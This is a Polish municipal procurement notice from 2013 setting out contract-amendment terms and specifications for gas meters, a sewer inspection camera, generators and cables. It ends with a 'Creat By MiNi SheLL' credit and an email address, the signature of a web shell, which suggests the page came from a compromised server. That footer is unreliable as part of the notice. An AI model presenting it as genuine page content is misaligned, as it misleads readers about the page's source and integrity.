22.2.8.	wystąpienie okoliczności uniemożliwiających wykonanie przedmiotu umowy zgodnie z SIWZ, w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, demonstracje, nagłe załamanie warunków pogodowych uniemożliwiające realizację przedmiotu umowy zgodnie ze sztuką i normami, przy czym wydłuża się termin realizacji przedmiotu umowy o udokumentowaną ilość dni, w których wystąpiły powyższe niekorzystne warunki uniemożliwiające realizację umowy. 
22.2.9.	zmiana obowiązującej stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie lub zmniejszenie kosztów wykonania umowy po stronie Dostawcy, Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia wynagrodzenia 
w wysokości odpowiadającej zmianie podatku;
22.2.10.zaniechania wykonania części zamówienia. W takim przypadku wynagrodzenie przysługujące Dostawcy zostanie pomniejszone, a termin realizacji odpowiednio skrócony, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Dostawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. Zmiana taka jest rozumiana jako zmniejszenie zakresu rzeczowego danego pakietu w przypadku:
22.2.10.1.konieczności ograniczenia części zamówienia z uwagi na wystąpienie obiektywnych przyczyn technicznych;
22.2.10.2.wystąpienia innych prawnych lub technicznych okoliczności uniemożliwiających w sposób obiektywny realizację przedmiotu umowy;
22.2.11.zmiany terminu wykonania zamówienia, jeżeli konieczność zmiany terminu nie wynika z przyczyn zależnych od Dostawcy, w szczególności w przypadku następstw działań administracyjnych;
22.2.12.wydłużenie okresu gwarancji i rękojmi o dowolny okres;
22.2.13.zmiany przepisów prawa obowiązujących po dacie zawarcia umowy, wywołujących potrzebę zmian umowy wraz ze skutkami wprowadzenia takich zmian - w takim przypadku zmianie mogą ulec wyłącznie zapisy umowy, do których odnoszą się wspomniane zmiany przepisów prawa;
22.2.14.zmiana terminu wykonania zamówienia w przypadku wystąpienia opóźnień wynikających z: 
23.2.18.1.przestojów i opóźnień zawinionych przez Zamawiającego, 
23.2.18.2.działania siły wyższej mającej bezpośredni wpływ na terminowość realizacji zamówienia, 
23.2.18.3.wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności. 
22.3.Zmiany, o których mowa w niniejszym punkcie, muszą być udokumentowane stosownymi protokołami podpisanymi przez Dostawcę i zaakceptowanymi przez Zamawiającego.
22.4.W przypadku wystąpienia opóźnień, strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub przestoju.
22.5.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
22.6.Dostawca zobowiązany jest wykazać zaistnienie okoliczności powodujących zmianę poprzez przedłożenie stosownych ekspertyz, opinii.
22.7.Istotne zmiany treści umowy wymagają formy pisemnej pod rygorem nieważności.
22.8.Podpisanie aneksu do umowy powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności i protokołem z negocjacji zawierających istotne okoliczności zmiany.
22.9.Nie stanowi zmiany umowy w rozumieniu art.144 u.p.z.p. w szczególności:
22.9.1.zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (m.in. zmiana nr rachunku bankowego);
22.9.2.zmiany danych teleadresowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.komunalny.jasienica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny w Jasienicy, 43-385 Jasienica 459.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 11:00, miejsce: Zakład Komunalny w Jasienicy, 43-385 Jasienica 459, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ocena spełniania warunków udziału w niniejszym postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia na podstawie przedłożonych przez Dostawcę dokumentów i oświadczeń. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Dostawca spełnił..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1 - MIERNIKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okres gwarancji - min. 36 miesięcy
3.4.1.Przenośny miernik wielogazowy - 4 szt. Wymagania minimalne:
3.4.1.1.	Fabrycznie nowy
3.4.1.2.	Pomiar stężenia min. następujących gazów: O2, CO, H2S, CH4 i gazów wybuchowych
3.4.1.3.	Przejrzysty duży wyświetlacz
3.4.1.4.	Sygnalizator akustyczny, świetlny i wibracyjny 
3.4.1.5.	Wewnętrzna pamięć
3.4.1.6.	Wyposażony w dodatkową sondę teleskopową z materiału kwasoodpornego o długości min. 1,5m 
3.4.1.7.	Wodoodporny
3.4.1.8.	Instrukcja obsługi w języku polskim.
3.4.1.9.	Zasilanie akumulatorowe 
3.4.1.10.Ładowarka sieciowa 230V + ładowarka samochodowa 12V
3.4.1.11.Gwarancja - 36 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - ZADYMIARKI, KAMERY, KORKI, NARZĘDZIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okres gwarancji - min.36 miesięcy dla każdego z urządzeń/ narzędzi
3.5.1.	Zadymiarka kanałowa - 1 komplet. Wymagania minimalne:
3.5.1.1.	Fabrycznie nowa
3.5.1.2.	Emisja dymu - minimum 830 m3/min.
3.5.1.3.	50 litrów płynu do wytwarzania mgły.
3.5.1.4.	Wąż PVC długości min. 6 metrów umożliwiający wprowadzenie dymu do rury
3.5.1.5.	Zamykany na klucz kufer do transportu urządzenia
3.5.1.6.	Maksymalny pobór mocy - 2500W
3.5.1.7.	Instrukcja obsługi w języku polskim lub szkolenie w siedzibie Zamawiającego
3.5.2.Kamera Inspekcyjna - 1 komplet. Do zastosowania w rurach o średnicy 
od 70 do 400 mm. Wymagania minimalne kompletu:
3.5.2.1.	Fabrycznie nowa
3.5.2.2.	Kamera:
3.5.2.2.1.Wodoszczelna do głębokości zanurzenia min. 1 m
3.5.2.2.2.Przesyłająca kolorowy obraz do monitora 
3.5.2.2.3.Autopoziomowanie
3.5.2.2.4.Oświetlenie LED
3.5.2.2.5.Przystosowana do pokonywania łuków
3.5.2.2.6.Wykonana ze stali kwasoodpornej
3.5.2.2.7.Odporna na zarysowania soczewka obiektywu kamery
3.5.2.2.8.Szeroki kąt widzenia od 75 stopni
3.5.2.2.9.Skrętne oko
3.5.2.2.10.Automatyczny powrót oka do pozycji początkowej
3.5.2.3.	Jednostka sterująca:
3.5.2.3.1.Przenośna
3.5.2.3.2.Monitor kolorowy wielkości od 5 - 8 cali z osłoną przeciwsłoneczną
3.5.2.3.3.Cyfrowa rejestracja obrazu z kamery (zapis obrazu) z możliwością wykonywania zdjęć
3.5.2.3.4.Dane na ekranie: licznik odległości, data oraz czas
3.5.2.3.5.Elektroniczny licznik odległości z pamięcią i możliwością oznaczania uszkodzonych odcinków
3.5.2.3.6.Nośnik danych - karta SD min. 8 GB, dopuszcza się możliwość zapisu na 4 osobnych kartach, po 2GB każda
3.5.2.3.7.Klawiatura z powierzchnią zabezpieczającą przed wodą
3.5.2.3.8.Format zapisu w standardzie DVD
3.5.2.3.9.Regulacja oświetlenia kamery
3.5.2.3.10.Edytor tekstu do wprowadzania opisów i komentarzy na obraz
3.5.2.4.	Oprogramowanie inspekcyjne: 
3.5.2.4.1.Polskojęzyczne
3.5.2.4.2.Przyjazny dla użytkownika interfejs
3.5.2.4.3.Możliwość zapisu danych oraz ich wydruku w postaci raportów
3.5.2.5.	Wytrzymały mechanicznie bęben z elastycznym kablem wizyjnym do posuwu kamery i przesyłania obrazu:
3.5.2.5.1.Długość min. 60 metrów bieżących
3.5.2.6.	Akcesoria umożliwiające pracę kamery dla większych średnic rur (np. wózek)
3.5.2.7.	Zasilanie sieciowe oraz akumulatorowe.
3.5.2.8.	Sonda położenia głowicy kamery
3.5.3.Korek pneumatyczny kanalizacyjny blokujący do przekroi kołowych:
3.5.3.1.	Fabrycznie nowe
3.5.3.2.	Dla średnic od 150 do 300 mm - 3szt.
3.5.3.3.	Dla średnic od 200 do 400 mm - 3 szt.
3.5.3.4.	Manometr do węża ciśnieniowego - 2 szt.
3.5.3.5.	Wąż ciśnieniowy pneumatyczny do łączenia korków z kompresorem - długość min. 10 metrów w formie spirali - 6 szt.
3.5.4.Metalowe haki do otwierania włazów studzienek kanalizacyjnych - 3 szt.
3.5.4.1.Fabrycznie nowe
3.5.5.Wybieraki do studni:
3.5.5.1.	Fabrycznie nowe
3.5.5.2.	Długości 1,5 m - 3,5 m, z czaszą walcowatą - 2 szt.
3.5.5.3.	Długości 1,5 m - 3,5 m,  w formie chwytaka np. trójpalczastego - 2 szt.
3.5.6.Maszyna do mechanicznego czyszczenia rur - 1 komplet. Minimalne wymagania:
3.5.6.1.	Fabrycznie nowa
3.5.6.2.	Przeznaczona do zastosowania w rurach od 75 mm do 315 mm.
3.5.6.3.	Spirale do średnic rur wymienionych w pkt. 3.5.6.2. - 60 mb (łączone ze sobą z krótszych elementów)
3.5.6.4.	Kosz na spirale
3.5.6.5.	Wiertła
3.5.6.4.1.Proste 32mm- 2 szt.
3.5.6.4.2.Lejkowe 32mm- 2 szt.
3.5.6.4.3.Obłe 32mm - 2 szt.
3.5.6.4.4.Widełkowa głowica tnąca 32mm - 2 szt.
3.5.6.4.5.Końcówka widelcowa dla rur o średnicy 160 oraz 200 - 2 szt.
3.5.6.6.	Zasilanie za pomocą silnika elektrycznego lub spalinowego
3.5.6.7.	Obroty prawo/lewo..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.99.70.00-1, 32.20.00.00-5, 42.65.10.00-4, 44.51.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - AGREGATY PRĄDOTWÓRCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okres gwarancji - min. 36 miesięcy
3.6.1.	Agregat prądotwórczy przewoźny - 1 szt.:
3.6.1.1.	Agregat prądotwórczy musi posiadać deklarację zgodności WE (oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami) zgodnie z art. 5 ust. 10 ustawy z 30 sierpnia 2002r. o systemie oceny zgodności (t.j. Dz.U. z 2010, Nr 138, poz. 935) wraz z uszczegółowieniem tych wymogów i wyposażeniem podanym niżej. Deklarację zgodności WE Dostawca będzie zobowiązany dostarczyć przed podpisaniem umowy.
3.6.1.2.	Fabrycznie nowy
3.6.1.3.	Przeznaczenie: awaryjne zasilanie pompowni ścieków lub stacji tłoczenia ścieków 
3.6.1.3.1.Pompownia ścieków - maksymalna moc pomp to 2 × 5,5 kW
3.6.1.3.2.Stacja tłoczenia moc kompresorów to 2 × 21kW (uruchamiane za pomocą falowników)
3.6.1.4.	Zabudowany na przyczepie homologowanej dwuosiowej z hamulcem najazdowym spełniającej wymagania zapisów ustawy Prawo o ruchu drogowym, przeznaczonej dla samochodów osobowych, wyposażonej m.in. w: instalację oświetlenia, przewód zasilający, miejsce na tablicę rejestracyjną, koło zapasowe, kliny i podpory boczne czy kółko podporowe dyszla
3.6.1.5.	Silnik 
3.6.1.5.1.wysokoprężny gwarantujący uzyskanie wymaganej mocy,
3.6.1.5.2.chłodzony cieczą 
3.6.1.5.3.wyposażony w kolektor wydechowy z tłumikiem, kolektor dolotowy powietrza 
3.6.1.5.4.elektryczny rozruch z akumulatora
3.6.1.5.5.alternator ładowania baterii akumulatora
3.6.1.6.	Zbiornik paliwa o pojemności zapewniającej pracę bez konieczności tankowania przez co najmniej 8 h
3.6.1.7.	Panel sterowania agregatu winien posiadać co najmniej: 
3.6.1.7.1.przycisk uruchomienia silnika, 
3.6.1.7.2.przycisk awaryjnego wyłączenia silnika, 
3.6.1.7.3.główny wyłącznik prądu, 
3.6.1.7.4.urządzenia kontrolno-pomiarowe: obrotomierz, licznik motogodzin pracy, 
3.6.1.7.5.kontrolka ładowania akumulatora, 
3.6.1.7.6.kontrolka ciśnienia oleju w silniku, 
3.6.1.7.7.kontrolka temperatury płynu chłodzącego w silniku
3.6.1.7.8.Gniazda wtykowe min. 2 x 400V/63A i 3 x 230V/16A 
3.6.1.8.	Agregat wyposażony co najmniej w:
3.6.1.8.1.zabezpieczenie przeciwporażeniowe
3.6.1.8.2.wyłącznik przeciwporażeniowy
3.6.1.9.	Prąd nominalny agregatu: 63A - 70A
3.6.1.10.Moc min. 36kW
3.6.1.11.Napięcie znamionowe 230/400V, częstotliwość - 50 Hz
3.6.1.12.Agregat trójfazowy
3.6.1.13.Regulator napięcia AVR
3.6.1.14.układ tłumienia drgań mechanicznych na ramie
3.6.1.15.stalowa,  odporna  na  warunki  atmosferyczne  osłona  akustyczna  całego  zespołu zapewniająca utrzymanie poziomu hałasu do maksimum 79 dB(A) z odległości 1m od urządzenia
3.6.1.16.Dopuszczalna masa całkowita (agregat wraz z przyczepą) - 2000 kg
3.6.2.	Agregat prądotwórczy przenośny - 1 szt.
3.6.2.1.	Agregat prądotwórczy musi posiadać deklarację zgodności WE (oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami) zgodnie z art. 5 ust. 10 ustawy z 30 sierpnia 2002r. o systemie oceny zgodności (t.j. Dz.U. z 2010, Nr 138, poz. 935) wraz z uszczegółowieniem tych wymogów i wyposażeniem podanym niżej. Deklarację zgodności WE Dostawca będzie zobowiązany dostarczyć przed podpisaniem umowy.
3.6.2.2.	Fabrycznie nowy
3.6.2.3.	Przeznaczenie: zasilanie przenośnych narzędzi takich jak wiertarka, kamera inspekcyjna, przenośne oświetlenie halogenowe
3.6.2.4.	Agregat trójfazowy
3.6.2.5.	Napięcie znamionowe 400V oraz 230V
3.6.2.6.	Gniazda wtykowe min. 1 x 400V/16A i 2 x 230V/16A
3.6.2.7.	Moc 230V: 3,5 - 4,5 kW; moc 400V: 4,5 - 6 kW
3.6.2.8.	Rozruch: rewersyjny linką
3.6.2.9.	Wyłącznik termiczny
3.6.2.10.Wyłącznik przy braku oleju.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.12.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - PRZEWODY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.8.Okres gwarancji - min. 24 miesiące
2.8.Przewód umożliwiający podłączenie agregatu do przepompowni ścieków:
a)Fabrycznie nowe
b)Długość przewodu: 
pierwszego: 200 mb zwijany na szpulę - 1 szt.
drugiego: 15 mb - 1 szt.
c)Przewody ruchome o żyłach miedzianych typu H07RN-F (lub równoważny), o przekroju 5x10 mm2 zakończone z jednej strony wtyczką, a z drugiej gniazdem -  obydwa gniazda 63A..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.30.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com